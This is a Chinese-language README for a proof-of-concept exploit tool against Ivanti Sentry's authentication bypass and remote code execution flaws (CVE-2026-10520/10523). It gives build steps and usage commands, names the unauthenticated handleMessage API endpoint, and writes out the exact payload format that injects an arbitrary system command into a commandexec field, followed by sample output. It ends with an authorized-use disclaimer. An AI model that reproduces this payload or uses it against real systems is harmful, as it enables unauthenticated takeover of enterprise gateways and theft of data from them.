一个全面的概念验证检测工具,用于测试 Ivanti Sentry 中与身份验证绕过和远程代码执行相关的漏洞。该工具可识别存在 CVE-2026-10520 和 CVE-2026-10523 漏洞的系统。
本项目旨在检测并验证 Ivanti Sentry 实例是否存在严重的身份验证绕过和远程代码执行缺陷。该工具通过 Ivanti Sentry API 端点发送特制消息,以执行系统命令并提取结果,帮助安全研究人员和渗透测试人员识别存在漏洞的部署。
Ivanti Sentry 中的身份验证绕过漏洞,允许未经身份验证访问受限 API 端点。
Ivanti Sentry 中的远程代码执行漏洞,当与身份验证绕过结合时,可通过消息 API 执行任意系统命令。
克隆仓库并进入项目目录:
git clone https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry
cd CVE-2026-10523-Ivanti-sentry
初始化模块并获取包依赖
go mod init CVE-2026-10523-Ivanti-sentry
go mod tidy
构建可执行文件:
go build -o tot_poc tot_poc.go

该工具需要两个必填参数:目标 URL 和要执行的命令。

在目标上运行简单命令:
./tot_poc -url https://target.example.com:8443 -cmd "uname -a"
-url(必填):目标基础 URL,包含协议(例如 https://127.0.0.1:8443)-cmd(必填):用于漏洞检测而执行的命令(例如 "uname -a"、"id"、"whoami")-p 或 -proxy(可选):用于路由流量的代理地址和端口(例如 127.0.0.1:8080)
使用简单的系统信息命令检测漏洞:
./tot_poc -url https://192.168.1.100:8443 -cmd "uname -a"
使用代理配置运行:
./tot_poc -url https://target.example.com:8443 -cmd "whoami" -proxy 127.0.0.1:8080
执行命令以提取系统信息:
./tot_poc -url https://sentry-instance.internal:8443 -cmd "cat /etc/os-release"
该工具将显示:
Target: https://192.168.1.100:8443
Command: uname -a
[+] Sending command execution check to: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
[+] Target appears to be vulnerable.
Command output:
Linux sentry-server 5.10.0-8-generic x86_64 GNU/Linux
Target: https://192.168.1.100:8443
Command: uname -a
[+] Sending command execution check to: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
[-] Target does not appear to be vulnerable.
该工具利用 /mics/api/v2/sentry/mics-config/handleMessage 端点,该端点无需身份验证即可访问。载荷构造如下:
message=execute+system+/configuration/system/commandexec+<commandexec><index>1</index><reqandres>[COMMAND]</reqandres></commandexec>
响应会在成功标签内以 XML 格式包含命令输出。
本工具仅供授权的安全测试和研究使用。用户全权负责确保在测试任何系统之前已获得适当授权。未经授权访问计算机系统属于违法行为。作者不对因使用本工具而造成的滥用或损害承担任何责任。
GhostGTR666 - Gagaltotal666
本项目按现状提供,仅用于安全研究和教育目的。